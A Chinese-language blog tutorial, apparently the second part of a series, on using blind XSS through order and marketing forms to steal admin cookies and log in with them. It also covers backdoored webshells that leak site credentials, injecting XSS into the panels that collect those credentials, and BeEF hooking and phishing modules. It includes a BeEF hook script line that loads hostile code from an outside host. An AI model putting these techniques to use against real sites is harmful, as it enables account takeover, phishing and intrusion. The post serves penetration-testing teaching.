XSS之订单以及shell箱子反杀记(二)

应用场景

各种网上营销场景

营销

这种营销提交框 都可以利用xss盲打,后台管理只要进后台看就中招。

营销2

还有这种,只要是提交,他后台管理员看就中招

实战案例

实战0

这里打开了一个网站页面,我们进行提交

实战1

实战2

提交以后假装我们是管理员商家进入后台看:

实战3

成功执行。

实战4

接下来我们借助XSS平台+postman实现 窃取管理cookie并且 登录网站 这里以攻击者角度看 我们并不知道网站账号密码,利用xss实现登录。

实战5

我们再次模拟管理员进行后台登录查看订单:

实战6

这里可以看到以及执行了我们的代码了,目标数据已被窃取发送到我们xss平台。

我们去xss平台查看:

实战7

我们得到cookie和url ,利用postman进行登录:

实战8

头部加上cookie值 成功登录后台。

Shell箱子以及反杀

shell箱子
很多人在网上发布大马,他们在大马中写入了后门。当你成功把有后门的大马上传到目标网站上时,大马就会把该网站的url以及密码发送给在大马留过后门的人。

人家用php随便写几句代码,你访问你的大马时候,路径跟密码发人家服务器去了,你变成打工仔了。

$_SERVER['HTTP_HOST']//获取当前的url
$_SERVER['PHP_SELF']//获取当前访问的文件路径

图片[12]-XSS之订单以及shell箱子反杀记(二)-Drton1博客

这里:

1

因为webshell箱子会对网马传过去的url以及密码进行显示,所以我们可以把url或者密码处改成跨站脚本代码去获取对方网站webshell箱子的cookie;

反杀让他变成打工仔。

2

怎么样检测下载的大马里有没有被别人留下后门?
先把下载的网马放到本地环境进行测试
此时用浏览器或者抓包工具查看数据包
发现此处对一个莫名其妙的地址进行了访问,并且携带了GET参数,证明这个网马中被别人留下了后门

3

beef的使用和其他

beef

beef是真牛逼,功能强大,kali自带。

BeeF是前欧美最流行的web框架攻击平台,kali 集成Beef,而且Beef有很多好使的payload。例如,通过XSS这个简单的漏洞,BeeF可以通过一段编制好的javascript控制目标主机的浏览器,通过浏览器拿到各种信息并且扫描内网信息,同时能够配合metasploit进一步渗透主机,强大的有些吓人。
beef也是属于c/s结构,具体看图

beef

我们kali启动后 访问:

beef0

beef

根据用例他的钩子是<script src=”http://192.168.217.129:3000/hook.js”></script>

我们还用刚才那个提交:

beef1

然后进入管理页面去触发:

beef2

这里成功上线。

beef牛逼就牛逼再钓鱼模块非常多,而且还支持内网扫描等,非常骚。

这里利用beef给受害者弹一个虚假的弹窗,跟真的一样。

虚假通知beef

还有n多钓鱼模块,骗你更新flah 但是下载的是木马,等等。

beef钓鱼

其他

关于xss,如果对方采用session验证,那么你拿到cookie也没用,还是进不去。

session在服务端 你盗取的只是 客户端 所以不行

cookie中的PHPSESSID 表示对方是一个PHP的站点

如果想获得session可以尝试利用xss诱骗对方访问phpinfo的界面 并且打包回来,里面有session值。

但是实战作用不大,因为session的生存期很短。

© 版权声明
THE END
喜欢就支持一下吧
点赞9 分享
评论 抢沙发

请登录后发表评论